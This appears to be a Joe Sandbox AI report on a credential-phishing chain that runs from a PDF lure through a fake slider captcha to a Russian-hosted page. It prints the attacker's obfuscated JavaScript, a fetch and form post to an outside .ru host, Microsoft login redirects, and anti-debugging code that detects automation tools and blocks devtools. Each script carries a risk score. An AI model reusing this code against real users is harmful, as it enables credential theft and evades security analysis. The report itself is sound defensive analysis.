| URL: PDF document Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Document Signature Required",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": true,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: PDF document Model: Joe Sandbox AI | {
"brands": [
"Bontrager"
]
} |
|
| URL: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5s... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The heavy obfuscation and use of encoded strings further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent."
} |
(function(_0x4a596b,_0x31a4ff){const _0x590499=_0xaaf2,_0x2b2108=_0x4a596b();while(!![]){try{const _0x18c7b8=-parseInt(_0x590499(0xc2))/0x1*(parseInt(_0x590499(0xaf))/0x2)+-parseInt(_0x590499(0xb4))/0x3*(parseInt(_0x590499(0xa7))/0x4)+parseInt(_0x590499(0xa1))/0x5+parseInt(_0x590499(0xab))/0x6+parseInt(_0x590499(0xb2))/0x7*(parseInt(_0x590499(0xc1))/0x8)+parseInt(_0x590499(0xb3))/0x9+parseInt(_0x590499(0xb8))/0xa;if(_0x18c7b8===_0x31a4ff)break;else _0x2b2108['push'](_0x2b2108['shift']());}catch(_0x30c168){_0x2b2108['push'](_0x2b2108['shift']());}}}(_0x1b64,0x55ab5));const _0x218315=_0xf70e;function _0x2fdc(){const _0x50ba66=_0xaaf2,_0x5ddcc7=[_0x50ba66(0xaa),_0x50ba66(0xa6),_0x50ba66(0xb6),'href',_0x50ba66(0xb9),_0x50ba66(0xad),_0x50ba66(0xb0),_0x50ba66(0xa5),_0x50ba66(0xa3),_0x50ba66(0xbc),'then',_0x50ba66(0xc0),_0x50ba66(0xae),_0x50ba66(0xac),_0x50ba66(0xbe),_0x50ba66(0xb5),_0x50ba66(0xb7),'3227070RwXrGK',_0x50ba66(0xa2),'push','689483RTlxPz','https://reprise.repriseyes.ru/ri0M/#D','stringify','143050nrtIMW',_0x50ba66(0xbf),_0x50ba66(0xa9),'13168440AqAUcH',_0x50ba66(0x9f),_0x50ba66(0xa8),_0x50ba66(0xc4),_0x50ba66(0xba),_0x50ba66(0xa0)];return _0x2fdc=function(){return _0x5ddcc7;},_0x2fdc();}function _0xaaf2(_0x1ae758,_0x2df130){const _0x1b6493=_0x1b64();return _0xaaf2=function(_0xaaf2fa,_0x35bfe2){_0xaaf2fa=_0xaaf2fa-0x9f;let _0x212642=_0x1b6493[_0xaaf2fa];return _0x212642;},_0xaaf2(_0x1ae758,_0x2df130);}(function(_0xbd2344,_0x17b3cd){const _0x4fd878=_0xaaf2,_0x7c964f=_0xf70e,_0xb9f3ea=_0xbd2344();while(!![]){try{const _0x4b38ea=parseInt(_0x7c964f(0x16d))/0x1+parseInt(_0x7c964f(0x175))/0x2+parseInt(_0x7c964f(0x181))/0x3*(-parseInt(_0x7c964f(0x177))/0x4)+-parseInt(_0x7c964f(0x170))/0x5+-parseInt(_0x7c964f(0x168))/0x6+parseInt(_0x7c964f(0x16a))/0x7+parseInt(_0x7c964f(0x166))/0x8;if(_0x4b38ea===_0x17b3cd)break;else _0xb9f3ea[_0x4fd878(0xbd)](_0xb9f3ea[_0x4fd878(0xb9)]());}catch(_0x1629fa){_0xb9f3ea[_0x4fd878(0xbd)](_0xb9f3ea[_0x4fd878(0xb9)]());}}}(_0x2fdc,0x60bc6),function(_0x1ac5db,_0x295f63){const _0x58530a=_0xaaf2,_0x58e6e4=_0xf70e,_0x3b7f92=_0x36be,_0x2094cc=_0x1ac5db();while(!![]){try{const _0x4d0c3d=-parseInt(_0x3b7f92(0x1da))/0x1*(parseInt(_0x3b7f92(0x1d8))/0x2)+-parseInt(_0x3b7f92(0x1dd))/0x3+-parseInt(_0x3b7f92(0x1e5))/0x4+-parseInt(_0x3b7f92(0x1df))/0x5*(-parseInt(_0x3b7f92(0x1db))/0x6)+-parseInt(_0x3b7f92(0x1e3))/0x7+-parseInt(_0x3b7f92(0x1d6))/0x8*(parseInt(_0x3b7f92(0x1d9))/0x9)+parseInt(_0x3b7f92(0x1e6))/0xa;if(_0x4d0c3d===_0x295f63)break;else _0x2094cc[_0x58e6e4(0x16c)](_0x2094cc[_0x58e6e4(0x17d)]());}catch(_0x2a96d8){_0x2094cc[_0x58530a(0xbd)](_0x2094cc[_0x58e6e4(0x17d)]());}}}(_0x44b4,0x4363d));function _0x36be(_0x4c2236,_0xe8f2a6){const _0x10e8d3=_0x44b4();return _0x36be=function(_0x234bf3,_0x349076){_0x234bf3=_0x234bf3-0x1d4;let _0x4a414a=_0x10e8d3[_0x234bf3];return _0x4a414a;},_0x36be(_0x4c2236,_0xe8f2a6);}function _0x44b4(){const _0xa07b21=_0xaaf2,_0x51ecaf=_0xf70e,_0x400a81=[_0xa07b21(0xa4),_0x51ecaf(0x17a),_0xa07b21(0xbb),_0x51ecaf(0x169),_0x51ecaf(0x182),_0x51ecaf(0x174),_0x51ecaf(0x172),_0x51ecaf(0x183),_0x51ecaf(0x184),_0x51ecaf(0x167),_0x51ecaf(0x17b),_0x51ecaf(0x16b),_0xa07b21(0xc3),_0x51ecaf(0x178),_0x51ecaf(0x179),_0x51ecaf(0x173),_0x51ecaf(0x16e),_0x51ecaf(0x17c),_0x51ecaf(0x17e),_0x51ecaf(0x16f),_0xa07b21(0xb1),_0x51ecaf(0x176),'2839512iSptJM'];return _0x44b4=function(){return _0x400a81;},_0x44b4();}function _0xf70e(_0x4eb3e0,_0x5f537d){const _0x1bdd6c=_0x2fdc();return _0xf70e=function(_0x566309,_0x37cbd1){_0x566309=_0x566309-0x166;let _0x154828=_0x1bdd6c[_0x566309];return _0x154828;},_0xf70e(_0x4eb3e0,_0x5f537d);}const captcha=sliderCaptcha({'id':_0x218315(0x185),'repeatIcon':_0x218315(0x171),'onSuccess':function(){const _0x4cebbc=_0x218315,_0x3ebc4c=_0x36be,_0x2be480=window[_0x3ebc4c(0x1dc)][_0x3ebc4c(0x1d5)];let _0x53d848=_0x2be480[_0x4cebbc(0x180)](0x1);function _0x153e2c(_0x1604e4){const _0x245546=_0x3ebc4c;try{if(_0x1604e4[_0x245546(0x1e4)]%0x4!==0x0)return![];return btoa(atob(_0x1604e4))== |
| URL: https://gfsouto.com.br/cgi-documents/disk/longbow.... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be a slider-based CAPTCHA implementation, which is a common security feature. However, it has some moderate-risk indicators, such as the use of external data transmission to a remote URL for verification. Additionally, the script uses legacy practices like `XDomainRequest`, which poses minor risks. Overall, the script requires further review due to the unclear purpose of the remote URL and the use of outdated APIs."
} |
(function () {
'use strict';
var extend = function () {
var length = arguments.length;
var target = arguments[0] || {};
if (typeof target != "object" && typeof target != "function") {
target = {};
}
if (length == 1) {
target = this;
i--;
}
for (var i = 1; i < length; i++) {
var source = arguments[i];
for (var key in source) {
if (Object.prototype.hasOwnProperty.call(source, key)) {
target[key] = source[key];
}
}
}
return target;
}
var isFunction = function isFunction(obj) {
return typeof obj === "function" && typeof obj.nodeType !== "number";
};
var SliderCaptcha = function (element, options) {
this.$element = element;
this.options = extend({}, SliderCaptcha.DEFAULTS, options);
this.$element.style.position = 'relative';
this.$element.style.width = this.options.width + 'px';
this.$element.style.margin = '0 auto';
this.init();
};
SliderCaptcha.VERSION = '1.0';
SliderCaptcha.Author = 'argo@163.com';
SliderCaptcha.DEFAULTS = {
width: 280, // canvas
height: 155, // canvas
PI: Math.PI,
sliderL: 42, //
sliderR: 9, //
offset: 5, //
loadingText: 'Loading...',
failedText: 'Try Again',
barText: 'Slide To Verify',
repeatIcon: 'fa fa-repeat',
maxLoadCount: 3,
lousermages: function () {
return 'images/Pic' + Math.round(Math.random() * 4) + '.jpg';
},
verify: function (arr, url) {
var ret = false;
$.ajax({
url: url,
data: {
"datas": JSON.stringify(arr),
},
dataType: "json",
type: "post",
async: false,
success: function (result) {
ret = JSON.stringify(result);
console.log("Result: " + ret)
}
});
return ret;
},
remoteUrl: null
};
function Plugin(option) {
var $this = document.getElementById(option.id);
var options = typeof option === 'object' && option;
return new SliderCaptcha($this, options);
}
window.sliderCaptcha = Plugin;
window.sliderCaptcha.Constructor = SliderCaptcha;
var _proto = SliderCaptcha.prototype;
_proto.init = function () {
this.initDOM();
this.initImg();
this.bindEvents();
};
_proto.initDOM = function () {
var createElement = function (tagName, className) {
var elment = document.createElement(tagName);
elment.className = className;
return elment;
};
var createCanvas = function (width, height) {
var canvas = document.createElement('canvas');
canvas.width = width;
canvas.height = height;
return canvas;
};
var canvas = createCanvas(this.options.width - 2, this.options.height);
var block = canvas.cloneNode(true);
var sliderContainer = createElement('div', 'sliderContainer');
var refreshIcon = createElement('i', 'refreshIcon ' + this.options.repeatIcon);
var sliderMask = createElement('div', 'sliderMask');
var sliderbg = createElement('div', 'sliderbg');
var slider = createElement('div', 'slider');
var sliderIcon = createElement('i', 'fa fa-arrow-right sliderIcon');
var text = createElement('span', 'sliderText');
block.className = 'block';
text.innerHTML = this.options.barText;
var el = this.$element;
el.appendChild(canvas);
el.appendChild(refreshIcon);
el.appendChild(block);
slider.appendChild(sliderIcon);
|
| URL: https://gfsouto.com.br Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://gfsouto.com.br |
| URL: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29t Model: Joe Sandbox AI | {
"contains_trigger_text": true,
"trigger_text": "Complete the security check to confirm you are not a bot. This helps protect our organization from threats and spam.",
"prominent_button_name": "Slide To Verify",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": true,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
 |
| URL: https://gfsouto.com.br/cgi-documents/#amVzc2ljYS5sb3ZpbmdAYm9udHJhZ2Vyb3V0ZG9vcnMuY29t Model: Joe Sandbox AI | {
"brands": "unknown"
} |
|
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.lovin... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an untrusted domain, and it also redirects the user to a Microsoft login page, which is likely a phishing attempt. Overall, this script demonstrates highly suspicious and malicious behavior, posing a significant security risk."
} |
turnstile.render('#cf', {
sitekey: '0x4AAAAAAA5AXTyZ7cPsWDoz',
'error-callback': yLfYRhhaah,
callback: LvuzkyTDkF,
});
function yLfYRhhaah() {
turnstile.reset();
}
function LvuzkyTDkF() {
var shaYxrLVme = document.getElementById("SwhdYymcGB");
shaYxrLVme.onsubmit = function (event) {
event.preventDefault();
};
document.getElementById("pagelink").value = 'WY7H';
var UBvjmnwOLu = "../dxxldrv8igGlQYckZu7V6Zj8o0k5nVhZxQ3l1Z23eUkj";
fetch('https://g3Su5GWNdWqYYMO0D5HM5pNUVUZr1J401t2nHXlZ8lijNtzZLmt.expritraw.ru/ypMrpFlkWXuQOASoWbuFRlxtxkQMZCQHSOWQHPHLWICYRCPXMORYEWXAQFFZI', {
method: "GET",
}).then(response => {
return response.text()
}).then(text => {
if(text == 0){
fetch(UBvjmnwOLu, {
method: "POST",
body: new FormData(shaYxrLVme)
}).then(response => {
return response.json();
}).then(data => {
if(data['status'] == 'success'){
if(FcubsHjahg == false){
location.reload();
}
}
if(data['status'] == 'error'){
window.location.replace('https://login.microsoftonline.com');
}
});
}
if(text != 0){
window.location.replace('https://login.microsoftonline.com');
}
})
.catch(error => {
window.location.replace('https://login.microsoftonline.com');
});
}
|
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.lovin... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution."
} |
if(atob("aHR0cHM6Ly9yZXByaXNlLnJlcHJpc2V5ZXMucnUvcmkwTS8=") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNUZUtLcmR4c0NuIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI1RlS0tyZHhzQ24gaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1RlS0tyZHhzQ24gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojVGVLS3JkeHNDbiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1RlS0tyZHhzQ24uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNjZweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI1RlS0tyZHhzQ24gLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiNUZUtLcmR4c0NuIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojVGVLS3JkeHNDbiAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiNUZUtLcmR4c0NuIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiNUZUtLcmR4c0NuIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojVGVLS3JkeHNDbiAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojVGVLS3JkeHNDbi5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI1RlS0tyZHhzQ24gLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiNUZUtLcmR4c0NuICNkUXBkS21YbVV2IHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQpGY3Vic0hqYWhnID0gZmFsc2U7DQooZnVuY3Rpb24ganVJVUJVaU1hZygpIHsNCiAgICBsZXQgeXlLZE9kVGJaTiA9IGZhbHNlOw0KICAgIGNvbnN0IENTdFRobk95anYgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IGZNYnZBWURSSGcgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAg |
| URL: https://reprise.repriseyes.ru/ri0M/#Djessica.lovin... Model: Joe Sandbox AI | {
"risk_score": 9,
"reasoning": "This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of preventing analysis and redirecting users to a potentially malicious login page."
} |
if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
if (event.keyCode === 123) {
event.preventDefault();
return false;
}
if (
(event.ctrlKey && event.keyCode === 85) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
(event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
(event.ctrlKey && event.keyCode === 72) ||
(event.metaKey && event.altKey && event.keyCode === 73) ||
(event.metaKey && event.altKey && event.keyCode === 67) ||
(event.metaKey && event.keyCode === 85)
) {
event.preventDefault();
return false;
}
});
document.addEventListener('contextmenu', function(event) {
event.preventDefault();
return false;
});
FcubsHjahg = false;
(function juIUBUiMag() {
let yyKdOdTbZN = false;
const CStThnOyjv = 100;
setInterval(function() {
const fMbvAYDRHg = performance.now();
debugger;
const sJHMAyGKph = performance.now();
if (sJHMAyGKph - fMbvAYDRHg > CStThnOyjv && !yyKdOdTbZN) {
FcubsHjahg = true;
yyKdOdTbZN = true;
window.location.replace('https://login.microsoftonline.com');
}
}, 100);
})();
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "This script appears to be a Cloudflare challenge script, which is a common security mechanism used to protect websites from abuse. While it uses some obfuscation techniques, the script's purpose is to verify the user's browser capabilities and not to perform any malicious activities. The script does not exhibit any high-risk behaviors, and its interactions are with known, trusted Cloudflare domains. Therefore, the overall risk score is low."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '942bp',
chlApiSitekey: '0x4AAAAAAA5AXTyZ7cPsWDoz',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'U14MXlStQlcY0FGCs0tZbaaEgzea_J.siHEBI_u.kUk-1736538534-1.3.1.1-hZYhz5NH8ViaHzhB1dySzmyP147Yov0xmr9jxHMGBJE',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fff2ff18c63728c',
cH: 'uHpP1yFaZYVwTb.b9Ij0KbyxKCJDSu7qSYSqvmZYjqM-1736538534-1.1.1.1-LU2OuuiawPDCjHB2ZluOoUhqXNsi.Rf9VLXXmSBT0vdd6fArjrWaKRNhNYuFdbGP',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'thFUPglm5vdumJQx.4GwLxNohOkL8upxP8ca0v5qDoA-1736538534-1.1.1.1-1_dbETjbbUWc76_wG4vThUikjXApqO8Djd8bCFs8gXaMQmddfQf7Xm5PH70_jpbS3nVxEeB93crYq0bg6LOX8okXTqYoktKtTLeEb1X2z7KdEecjxQkzSywP.jLr8rOvE1Y4DmpcEh3_dgp1un5vjr5H3ptYpFQwDdNzHqGRoLQe_eUxNE0f88ckJV7uI52mZbafrDMXYoBVH_NTEhz5Q_g5ddfOnRJ_Fc4orAUhSihC1cM9Wf5g21xwcFvAxJseM5GbCihW47ol8NISlPi0cDdQ1U6jqWzDVD86McQQhm9vyxqOtnoEYxX9vwk9gxCMrTjRqafKfJHdrbxVxmCOcANDLzsAv4GpmnEYGeDg6eeigKHq9xvFX_eAL9th5nDSe4RQV4rIbUMxcyrWu3neH3kp06CjIG45LVcY.JZCTukgQfaLfrKlT5JRpMDd1RMg6z3jf5Vonf5J5uRGcHTl3xVmEjiE7NDf5aGkuoGyWBBU_HAzPaXWKjPAoPGRD98qYR4YfcahHeTT7bIhwf8a8Cuckw3rA4r7T1Ga64wP9zqG9VdVNM77dHs9IMPGDl9Bnrr8Ty6HaASWhx1.Nk9x03kSDy4AZ5WfEn5ofdBUaaViOsWOI4hfTE.R.KMQCVdvenYAgj47m8heyYkq.PBNn3k8LXeMmt2t4rlVJZ4cX6xAZpMBcz.R36fmMlSP.oG6bv2loXddTyMu_6S57gZ1Aj6FuPwMKnxE6bX29
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate security mechanism used to protect websites from abuse. The script sets up event listeners and message handlers to communicate with the parent window, likely as part of a challenge-response system. While the script uses some techniques like dynamic code execution and data transmission, these are within the expected context of a Cloudflare challenge and do not indicate malicious intent. Overall, the script demonstrates behaviors consistent with a legitimate security mechanism and poses a low risk."
} |
(function(){
window._cf_chl_opt={
cvId: '3',
cZone: 'challenges.cloudflare.com',
cTplV: 5,
chlApivId: '0',
chlApiWidgetId: '942bp',
chlApiSitekey: '0x4AAAAAAA5AXTyZ7cPsWDoz',
chlApiMode: 'managed',
chlApiSize: 'normal',
chlApiRcV: 'U14MXlStQlcY0FGCs0tZbaaEgzea_J.siHEBI_u.kUk-1736538534-1.3.1.1-hZYhz5NH8ViaHzhB1dySzmyP147Yov0xmr9jxHMGBJE',
chlApiTimeoutEncountered: 0,
chlApiOverrunBudgetMs:10000,
chlTimeoutMs:120000,
cK:[],
cType: 'chl_api_m',
cRay: '8fff2ff18c63728c',
cH: 'uHpP1yFaZYVwTb.b9Ij0KbyxKCJDSu7qSYSqvmZYjqM-1736538534-1.1.1.1-LU2OuuiawPDCjHB2ZluOoUhqXNsi.Rf9VLXXmSBT0vdd6fArjrWaKRNhNYuFdbGP',
cFPWv: 'b',
cLt: 'n',
chlApiFailureFeedbackEnabled:true,
chlApiLoopFeedbackEnabled:false,
wOL:false,
wT: 'auto',
wS: 'normal',
md: 'thFUPglm5vdumJQx.4GwLxNohOkL8upxP8ca0v5qDoA-1736538534-1.1.1.1-1_dbETjbbUWc76_wG4vThUikjXApqO8Djd8bCFs8gXaMQmddfQf7Xm5PH70_jpbS3nVxEeB93crYq0bg6LOX8okXTqYoktKtTLeEb1X2z7KdEecjxQkzSywP.jLr8rOvE1Y4DmpcEh3_dgp1un5vjr5H3ptYpFQwDdNzHqGRoLQe_eUxNE0f88ckJV7uI52mZbafrDMXYoBVH_NTEhz5Q_g5ddfOnRJ_Fc4orAUhSihC1cM9Wf5g21xwcFvAxJseM5GbCihW47ol8NISlPi0cDdQ1U6jqWzDVD86McQQhm9vyxqOtnoEYxX9vwk9gxCMrTjRqafKfJHdrbxVxmCOcANDLzsAv4GpmnEYGeDg6eeigKHq9xvFX_eAL9th5nDSe4RQV4rIbUMxcyrWu3neH3kp06CjIG45LVcY.JZCTukgQfaLfrKlT5JRpMDd1RMg6z3jf5Vonf5J5uRGcHTl3xVmEjiE7NDf5aGkuoGyWBBU_HAzPaXWKjPAoPGRD98qYR4YfcahHeTT7bIhwf8a8Cuckw3rA4r7T1Ga64wP9zqG9VdVNM77dHs9IMPGDl9Bnrr8Ty6HaASWhx1.Nk9x03kSDy4AZ5WfEn5ofdBUaaViOsWOI4hfTE.R.KMQCVdvenYAgj47m8heyYkq.PBNn3k8LXeMmt2t4rlVJZ4cX6xAZpMBcz.R36fmMlSP.oG6bv2loXddTyMu_6S57gZ1Aj6FuPwMKnxE6bX29BXGip37NZNYYFc9_7e3nYOd2Wa_mcXy3njTSRiKfRyncx0G.4dlyzMMfaDQto7gpjNeZRqe1KItApmHpngkxzpQGDjzCTt2knUM8yQt0Vu8AO8N1Lm0dCOAwKgYvDHAu1vioU2xSKT2X8brY2AIM5H880QVqv7G38DdVfyT0gnVpc8zrtyoR6nnrxDvRv.AzTemG1Cp64W.9Z0ZtUsGk5UhmSFojs04pHlMDaN3Zm4578QbYCkSGMIr7b5QOA8VnEeNCrYAbNdbI7_PxtZc_XFwf5hGn7.6F7VxFA6n17BKHQ.P4ZF2wPPqv8QrnkQ5CChrjpm4HdD7TW__pRtVQKvg.46iCBIo4igYHIxmsT4C18DRylG_21xLtaotnvA_DscfAl6w9vpjLxEJPBXDoA5n9WnZt.MXMP9J.oEqQCUTlOKP1fTE.rvs0RJ7d0LhB9LZdSlb1rpbxte8uQsgAACNxXfsQe6WPXLS4lBMoDcgyGYmXyuVKOvu2HyznyjHOStKT4aw69JnkA1JwIMkTnfBwfr.bkDILymKc1wF.CXnk.CUJlwqZ4spqU1cyT_Q0Zpkv3RjRilf7BmxTf2wNh1msOLoZH.i11QbTGc3OF_KdTxPxp.vAImeuuE6u5THrl4lP.s',
cITimeS: '1736538534',
refresh: function(){
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: '942bp',
nextRcV: 'U14MXlStQlcY0FGCs0tZbaaEgzea_J.siHEBI_u.kUk-1736538534-1.3.1.1-hZYhz5NH8ViaHzhB1dySzmyP147Yov0xmr9jxHMGBJE',
event: 'reloadRequest',
}, "*");
}
}
};
var handler = function(event) {
var e = event.data;
if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
if(window['parent']){
window['parent'].postMessage({
source: 'cloudflare-challenge',
widgetId: window._cf_chl_opt.chlApiWidgetId,
event: 'food',
seq: e.seq,
}, '*');
}
}
}
window.addEventListener('message', handler);
}());
|
| URL: https://challenges.cloudflare.com/cdn-cgi/challeng... Model: Joe Sandbox AI | {
"risk_score": 2,
